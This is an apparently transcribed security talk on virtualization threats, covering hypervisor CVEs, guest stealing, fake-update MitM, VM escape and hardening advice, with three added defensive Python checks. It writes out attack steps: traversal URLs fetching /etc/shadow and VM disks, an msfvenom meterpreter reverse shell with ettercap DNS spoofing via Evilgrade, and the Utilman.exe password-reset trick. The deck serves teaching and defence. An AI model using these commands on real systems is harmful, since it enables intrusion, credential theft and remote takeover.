# WHO AM I
Senior Security Engineer
Penetration Testing
Incident Response
DISCLAIMERS
“This presentation does not encourage people to hack.”
(For educational purposes only)
AND
“The presentation does not cover all parts of the virtualization technology area.”
(It is rearranged from my thesis research literature review)
TOPIC
• Virtualization and hypervisor
• Virtualization threats and issues
• Vulnerability Statistics of widely used Hypervisors
• Guest VM Attack
• Virtualization environment network Attack
• Hypervisor Attack
• Hypervisor management and API Attack
• Host Attack from VM
• Docker Breakout by shocker
• Use Virtualization as Attack Tools
• Security for Virtualization
Virtualization
VIRTUALIZATION
[Slide: examples of virtualization in the cloud, e.g. Google, iCloud]
[Slide: hypervisor management clients: vSphere Client, vCenter, XenCenter, Virt-manager]
Hypervisor
HYPERVISOR
[Diagram: one Hypervisor running many VMs side by side]
[Diagram: VMware Workstation as a hypervisor example, with VMs on top]
HYPERVISOR VS DOCKER
• Application containers
Virtualization Threats
Vulnerability Statistic
[Chart from cvedetails.com: vulnerability counts per hypervisor product; the bars read 10, 7, 11, 8, 54, 58, 58 and 45, but the product labels were lost in extraction]
Bare-metal Hypervisor vulnerability
[Bar chart from cvedetails.com: bare-metal hypervisor vulnerabilities per year, 2008-2015; y-axis 0-200]
Bare-metal Hypervisor vulnerability 2008-2015 by type (cvedetails.com; categories and percentages paired in the order the slide lists them):
• DoS: 52%
• Gain Privileges: 15%
• Overflow: 12%
• Code Execution: 7%
• Gain Information: 6.5%
• Memory Corruption: 4.5%
• Bypass something: 2%
• Directory Traversal: 1%
• XSS: 0.5%
IS THE VIRTUALIZATION THREAT DIFFERENT FROM THE TRADITIONAL ENVIRONMENT?
Traditional stack:
• Application: Web, Web Service, Mail, FTP, DB
• OS: Linux, Windows, Solaris
• Hardware: CPU, Memory, Storage, NIC, Network
Attacks on the traditional stack: XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, ARP Poisoning
Virtualization stack:
• Application: Web, Web Service, Mail, FTP, DB
• OS: Linux, Windows, Solaris
• Hypervisor components: Kernel, Lib, API, Network
• Hardware: CPU, Memory, Storage, NIC, Network
The same attacks still apply (XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, ARP Poisoning), and the hypervisor components add an additional attack surface.
GENERAL SECURITY ISSUES FOR VIRTUALIZATION
• Information Leakage
• Unauthorized Access
- Intentional or unintentional
- By users or administrators
• Data remaining in storage
• Data Ownership
• Data migration at end of service
• Multi-tenancy
• Shared resources
• Use of VMs to commit fraud or crime
• Laws and regulations
VIRTUALIZATION TECHNICAL SECURITY ISSUE
GUEST VM ATTACK
• Traditional Attacks According To Services
• Guest VM attacks other Guest VMs (same network segment)
• Guest VM attacks other Guest VMs on the same Hypervisor (VM hyper jumping)
• Cross-VM Attack (Side Channel Attack)
• Guest Stealing
• Guest Copy
TRADITIONAL ATTACK
[Diagram: Guest VM1 attacks Guest VM2 through the services it exposes, both on one Hypervisor]
VM ATTACKS OTHER VMs
[Diagram: Guest VM1 attacks Guest VM2 on the same Hypervisor]
VM HYPER JUMPING
[Diagram: Guest VM1 reaches Guest VM2 by way of the shared Hypervisor]
CROSS-VM ATTACK (SIDE CHANNEL)
[Diagram: Guest VM1 infers information about Guest VM2 from the time or computational power consumed on the shared Hypervisor]
GUEST STEALING
[Diagram: a request to the Hypervisor Management API walks out of the SDK directory to a VM disk file]
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
GUEST STEALING: VASTO
[Slides: the same guest-stealing step carried out with the VASTO toolkit]
GUEST COPY (Authorized)
- Passwords
- OS
- Mail
- Cookies
- Browser history
- Sensitive Data
- Databases
- Configurations
- Source codes
- Software licenses
- Many more...
GUEST COPY (Unauthorized)
Copy them
IF ( VM == win7 or XP )
IF ( VM == 2008 or 2012 )
How about the password?
Ans: Reset it !!!
IF ( VM == 2008 or 2012 )
Insert a CD to do the tricky password reset via the repair option:
Copy cmd.exe to be Utilman.exe
And reboot
Press Windows Key + U
Bravo !!!
ps: http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html
Or add another account as administrator and hashdump
And crack it with JTR
IF ( VM == Unix ) THEN single_mode();
Forensic tools to access data: VMDK
Forensic tools to access data: Snapshot
NETWORK ATTACK
• Traditional Attacks According To Services
• vSwitch Attack
• Sniffing
• Scanning
• MitM
• OPEN VSWITCH CVE-2012-3449 INSECURE DIRECTORY PERMISSIONS VULNERABILITY
• CITRIX XENSERVER VSWITCH CONTROLLER VERSION 6.0.2.
- vSwitch Attack
- SNIFF: not much sensitive traffic to sniff in a modern VM/Hypervisor
- SCAN
MANAGEMENT API
• Directory Traversal
• Brute Force Attack
• auxiliary/scanner/vmware/vmware_http_login
• Burp Suite Intruder
• Response Splitting
CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability
• VMware ESXi 3.5 or earlier
• Fails to sufficiently sanitize user-supplied input data
• Exploiting the issue may allow an attacker to obtain sensitive information from the host operating system
[Diagram: a request to the Hypervisor Management API walks out of the SDK directory to a system file]
https://192.168.254.158:8333/sdk/../../../../../../etc/shadow
ESX root password
Crack it with JTR !!!
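The two traversal URLs on these slides (the /etc/shadow fetch above and the xxx.vmdk fetch under Guest Stealing) exploit the same defect: the management API does not sufficiently sanitize user-supplied paths. The following is an added example, not code from the slides or from VMware, showing an insufficient substring check beside a path-resolution check that rejects both slide URLs and their percent-encoded form. The document root /srv/vmware, the request log and the vimService.wsdl path are constructed for the example.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Hypothetical document root for the management API; a real server's layout differs.
WEB_ROOT = "/srv/vmware"

# Constructed request log: two entries are the traversal URLs shown on the slides,
# one is a harmless SDK request and one is the same traversal percent-encoded.
SAMPLE_REQUESTS = [
    "https://192.168.254.158:8333/sdk/vimService.wsdl",
    "https://192.168.254.158:8333/sdk/../../../../../../etc/shadow",
    "https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk",
    "https://192.168.254.158:8333/sdk/%2e%2e/%2e%2e/%2e%2e/etc/shadow",
]


def naive_is_safe(request_path: str) -> bool:
    """Insufficient check: looks for a literal '../' in the raw path only.
    It misses percent-encoded dots, which is the kind of gap the CVE describes."""
    return "../" not in request_path


def resolve_under_root(web_root: str, request_path: str):
    """Map a URL path onto the filesystem and return the resolved path only if it
    stays inside web_root; return None for anything that escapes it."""
    decoded = unquote(unquote(request_path))  # undo single and double encoding
    candidate = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))
    root = posixpath.normpath(web_root)
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def audit_requests(urls, web_root=WEB_ROOT):
    """Return the URLs whose path would escape the document root."""
    blocked = []
    for url in urls:
        path = urlsplit(url).path
        if resolve_under_root(web_root, path) is None:
            blocked.append(url)
    return blocked


if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        path = urlsplit(url).path
        print(url)
        print("  naive check:", "pass" if naive_is_safe(path) else "BLOCK")
        print("  path check: ", resolve_under_root(WEB_ROOT, path) or "BLOCK")
```

The lexical check is only the first line of defence; a real server should also resolve symlinks (os.path.realpath) and open files relative to the root. The point of naive_is_safe is that a substring filter on the raw path passes the encoded request straight through, which is what "fails to sufficiently sanitize" means in practice.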
BRUTE FORCE ATTACK
By Metasploit VMware Auxiliary Modules
BRUTE FORCE ATTACK
By Burp Suite Intruder
NO-CVE : HTTP RESPONSE SPLITTING
MANAGEMENT ENVIRONMENT ATTACK
• Hooking
• MiTM
• Fake Update
• Vmware-vilurker
• Evilgrade
HOOKING
MITM
[Diagram: Management Software, Attacker, Hypervisor, with the attacker relaying between the other two]
MITM: Which picture shows that we are under a MitM attack???
We never know !!!!
MITM: Which picture shows that we are under a MitM attack???
We never know again!!!!
MITM : vSphere Client
MITM : XenCenter
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
[Diagram, built up over several slides: the Admin's ESXi host fetches updates from softwareupdate.vmware.com over the Internet; the attacker inserts himself with ARP Spoofing and a Rogue DNS so that the update request is answered by the attacker's host instead]
FAKE MANAGEMENT SOFTWARE UPDATE
By vmware_vilurker
Credit: Watcharaphon Wongaphai
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
• create msfpayload > agent.exe (/usr/share/isr-evilgrade/agent/)
• create a handler and wait for the reverse connection
• add the update domain entry into /etc/ettercap/etter.dns
• ettercap -tqm arp:remote /victim/ /dnsserver real/ -> press p, select dns_spoof
• run evilgrade
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
root@localhost:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.74 LPORT=8080 -f exe > /opt/agent.exe
root@localhost:~# cp /opt/agent.exe /usr/share/isr-evilgrade/agent/agent.exe
root@localhost:~# echo "softwareupdate.vmware.com A 10.10.10.74" >> /usr/local/share/ettercap/etter.dns
root@localhost:~# sudo ettercap -tqm arp:remote // //
(press p, then select dns_spoof)
root@localhost:~# msfconsole
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 10.10.10.74
msf> set LPORT 8080
msf> exploit
root@localhost:~# evilgrade
evilgrade> config vmware
evilgrade> start
FAKE MANAGEMENT SOFTWARE UPDATE
Result
[Diagram: the Admin's ESXi host, still believing it talks to softwareupdate.vmware.com on the Internet, receives the fake update from the attacker by way of ARP Spoofing and Rogue DNS]
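The fake update only works because the admin's host accepts the attacker's ARP replies and the rogue DNS answer for softwareupdate.vmware.com. As an added example, not part of the slides and not a feature of vmware_vilurker or evilgrade, the following checks pick both symptoms out of a host's ARP cache and a DNS answer. The ARP table, the gateway 10.10.10.1, the baseline MAC and all other MAC addresses are constructed; 10.10.10.74 is the attacker address used on the slides.

```python
import ipaddress
import re

# Constructed 'arp -n' style output from the admin workstation during the attack:
# the attacker at 10.10.10.74 now shares the MAC that answers for the gateway.
ARP_TABLE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
10.10.10.1               ether   02:42:ac:11:00:01   C                     eth0
10.10.10.74              ether   02:42:ac:11:00:01   C                     eth0
10.10.10.20              ether   02:42:ac:11:00:20   C                     eth0
"""

GATEWAY_IP = "10.10.10.1"
# MAC recorded for the gateway during a known-good baseline (constructed value).
BASELINE_GATEWAY_MAC = "02:42:ac:11:00:fe"

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def parse_arp_table(text: str) -> dict:
    """Return {ip: mac} from 'arp -n' output, skipping the header and incomplete rows."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 3 and MAC_RE.match(fields[2].lower()):
            table[fields[0]] = fields[2].lower()
    return table


def arp_findings(table: dict, gateway_ip: str, baseline_mac: str) -> list:
    """Flag the two symptoms of ARP spoofing visible in a host's ARP cache: the
    gateway's MAC drifting from the baseline, and one MAC answering for several IPs."""
    findings = []
    observed = table.get(gateway_ip)
    if observed and observed != baseline_mac.lower():
        findings.append(f"gateway {gateway_ip} MAC changed: {baseline_mac.lower()} -> {observed}")
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} answers for several IPs: {', '.join(sorted(ips))}")
    return findings


def suspicious_update_resolution(name: str, answer: str,
                                 public_names=("softwareupdate.vmware.com",)) -> bool:
    """A vendor update host should never resolve to a private LAN address; the
    etter.dns entry on the slides points it at 10.10.10.74, which this catches."""
    addr = ipaddress.ip_address(answer)
    return name in public_names and (addr.is_private or addr.is_loopback or addr.is_link_local)


if __name__ == "__main__":
    for finding in arp_findings(parse_arp_table(ARP_TABLE), GATEWAY_IP, BASELINE_GATEWAY_MAC):
        print("ARP:", finding)
    print("DNS suspicious:", suspicious_update_resolution("softwareupdate.vmware.com", "10.10.10.74"))
```

Both checks are cheap enough to run from a scheduled job on the management workstation; the baseline MAC is the part that needs care, since it has to be captured on a network known to be clean. Pinning the update server's TLS certificate on the client side closes the same gap from the other direction.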
HYPERVISOR ATTACK
• Compromised Hypervisor (Hyper-jacking)
• Take Full Control
• Running a rogue hypervisor on top of an existing hypervisor
• Install hypervisor rootkits
• Denial of Service (the hypervisor is a great single point of failure)
• HyperCall Hooking/Attack
- DENIAL OF SERVICE : PSOD
- HYPERCALL HOOKING ATTACK
[Diagram: Xen i386 paravirtualization, with guests issuing hypercalls to the hypervisor]
• EXAMPLES
• CVE-2013-4553: Xen DOMCTL_GETMEMLIST hypercall in Xen 3.4.x through 4.3.x
• CVE-2012-3495: Xen hypercall PHYSDEV_GET_FREE_PIRQ
• Buffer overflow
• Denial of service
• Exploit code executed with privilege
- HYPERCALL HOOKING/ATTACK
CVE-2014-4947 AND 4948
LOCAL USERS DENY SERVICE AND OBTAIN POTENTIALLY SENSITIVE INFORMATION
• CVSS v2 Base Score: 10.0 (High)
• Citrix XenServer 6.2 SP1 and prior versions
• A local user on the guest system can trigger a buffer overflow in HVM (Hardware Virtual Machine) graphics console support
• An exploit on the guest system can cause
- Denial of service conditions
- Disclosure of potentially sensitive information
[Diagram, built up over several slides: three Guest VMs on a Hypervisor share its Resources through the HVM Graphic Console; one guest sends an oversized input (AAAAAAAAAAAAAAAAAAAA...AAAAA, then AAAAAAAAAAAAAAAAx00x00x00) through the console, which overflows into the hypervisor's resources]
CVE-2015-3456 : VENOM
• Virtualized Environment Neglected Operations Manipulation
• Discovered by Jason Geffner, CrowdStrike senior security researcher
• The bug (a buffer overflow) is in QEMU's virtual floppy disk controller (FDC).
• This vulnerable FDC code is used in numerous virtualization platforms and appliances, notably Xen, KVM, VirtualBox, and the native QEMU client.
• The attacker needs administrative or root privileges in the guest operating system in order to exploit VENOM.
• The VENOM vulnerability has existed since 2004, when the virtual floppy disk controller was first added to the QEMU codebase.
http://www.rapid7.com/resources/videos/venom-vulnerability-explained.jsp
[Diagram, built up over several slides, of the escalation chain:]
• Exploit to cause a buffer overflow within the FDC and break out of the VM
• Can access other VMs within that hypervisor
• Can jump to other VMs on other hypervisors
• Can access the underlying bare-metal system's hardware and use that to see other systems on the hypervisor's network
HOST ATTACK
VM ESCAPE
[Diagram: a VM on the Hypervisor reaches through to the Host and its Resources]
HOST ATTACK
- USING A PATH TRAVERSAL VULNERABILITY IN VMWARE'S SHARED FOLDERS
- CVE-2008-0923
- INSUFFICIENT INPUT VALIDATION
VM ESCAPE
0xc2 0x2e 0xc2 0x2e is taken as 0x2e 0x2e, i.e. ".."
../../../../../../boot.ini
VM ESCAPE
Modify VMFtp's source code to replace all occurrences of '+' with '\xc2' in an input pathname
VM ESCAPE
OR
VM ESCAPE
Modify the task schedule as a new job to run metX.exe and put it back into /windows/tasks
Put the created task onto the host
Generate meterpreter
VM ESCAPE
Run the handler and wait until it is time for the Task to run
And the host is compromised
CVE-2012-0217
Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64-bit CPUs
• Some 64-bit operating systems and virtualization software programs are vulnerable to local privilege escalation attacks when running on Intel processors (CPUs)
• Due to how Intel implemented the SYSRET instruction in their x86-64 extension
• Attackers could exploit the vulnerability to force Intel CPUs to return a general protection fault in privileged mode
• Affected: Windows 7 and Windows Server 2008 R2, the 64-bit versions of FreeBSD and NetBSD, the Xen virtualization software, as well as Red Hat Enterprise Linux and SUSE Linux Enterprise Server, which include the Xen hypervisor by default
Architecture Vulnerability.
[Slide: exploit code screenshot for CVE-2012-0217]
MALICIOUS SCRIPT IN HYPERVISOR
ROP
• Attack on the Xen hypervisor utilizing return-oriented programming (ROP).
• It modifies the data in the hypervisor that controls whether a VM is privileged or not and thus can escalate the privilege of an unprivileged domain (DomU)
[Slides: ROP chain illustration; the chain is triggered by a buffer overflow]
Unfortunately, this technique needs a lot of factors to line up to be possible in today's hypervisors
FUZZING
USE VIRTUALIZATION AS ATTACK TOOL
- Host Stealing (P2V host cloning)
VMware vCenter Converter Standalone
[Diagram: the converter is pointed at the Victim, 10.200.1.10, with the Administrator credentials (password masked), and at the destination, ESX or VMware Workstation on the Hacker Machine at 10.200.1.100, with the root credentials (password masked); the victim host is cloned 10.200.1.10 -> 10.200.1.100]
- Compromised Host
- Get root/admin password
Wait until finished
Don't forget to dump RAM, too!!!
P2V doesn't copy the current data in RAM from the victim server
volatility
Meterpreter pmdump
Finish ....and completely PWN
Have more time to get
- DB connection strings
- Server configurations
- Source code
- Crack more passwords
- Dig more sensitive files
But.. Nothing is easy in real life
DOCKER BREAKOUT
BY DOCKER SHOCKER
https://github.com/gabrtv/shocker
[Slides: shocker run demonstration]
Security for Virtualization
SECURITY FOR VIRTUALIZATION
• Contract, Law and Regulation
• System Segmentation
- VLAN / SDN
- Dedicated Management Network
- Dedicated Storage Networks
• Protect All Virtual System Files (Snapshot, VHDD, Configuration)
• Update Patches
• System Hardening
• Implement Security Monitoring and Detection Tools
• Security Assessment !!!!
• BCP / DRP
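Guest Copy earlier in the deck showed that whoever can read a VM's disk, snapshot or configuration files can take everything in the guest offline, which is why "Protect All Virtual System Files" is on this list. The check below is an added example, not part of the slides or of any vendor tool: it builds a constructed datastore directory (the good-vm and leaky-vm names, file contents and modes are made up) and reports VM artifacts that are readable or writable by group or others. The suffix list covers VMware, Hyper-V and QEMU/libvirt file types.

```python
import os
import stat
import tempfile
from pathlib import Path

# File types that hold a guest's disk, memory or configuration; anyone who can
# read these can "guest copy" the VM offline, as the slides describe.
VM_SUFFIXES = {".vmdk", ".vmx", ".vmsn", ".vmss", ".vmem", ".vhd", ".vhdx", ".qcow2", ".xml"}

# Any of these bits set means someone other than the owner can read or write the file.
EXPOSED_BITS = stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH


def audit_vm_files(root: str) -> list:
    """Walk a datastore directory and report VM artifacts that group or world can
    read or write. Returns sorted (relative path, octal mode) pairs."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in VM_SUFFIXES:
            mode = path.stat().st_mode
            if mode & EXPOSED_BITS:
                findings.append((str(path.relative_to(root)), oct(stat.S_IMODE(mode))))
    return sorted(findings)


def build_demo_datastore() -> str:
    """Create a constructed datastore with one well-protected VM and one exposed VM."""
    root = tempfile.mkdtemp(prefix="datastore-")
    layout = {
        "good-vm/good-vm.vmdk": 0o600,
        "good-vm/good-vm.vmx": 0o600,
        "leaky-vm/leaky-vm.vmdk": 0o644,            # world-readable disk image
        "leaky-vm/leaky-vm-Snapshot1.vmsn": 0o666,  # world-writable snapshot
        "leaky-vm/notes.txt": 0o644,                # not a VM artifact, ignored
    }
    for rel, mode in layout.items():
        full = Path(root, rel)
        full.parent.mkdir(parents=True, exist_ok=True)
        full.write_bytes(b"constructed placeholder content")
        os.chmod(full, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_datastore()
    for rel, mode in audit_vm_files(demo):
        print(f"exposed: {rel} ({mode})")
```

On a real datastore the same function is pointed at the mount point; the findings are the files whose ownership or mode should be tightened to the hypervisor's service account, and a nonempty result from a scheduled run is a change worth alerting on.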
CONCLUSION
• Traditional attack methods can be used to attack Virtualization Technology
• Virtualization Technology has more attack surfaces
• The Hypervisor is considered a single point of failure
• Secure by design, security protection and hardening are important for Virtualization Technology
Virtualization security and threat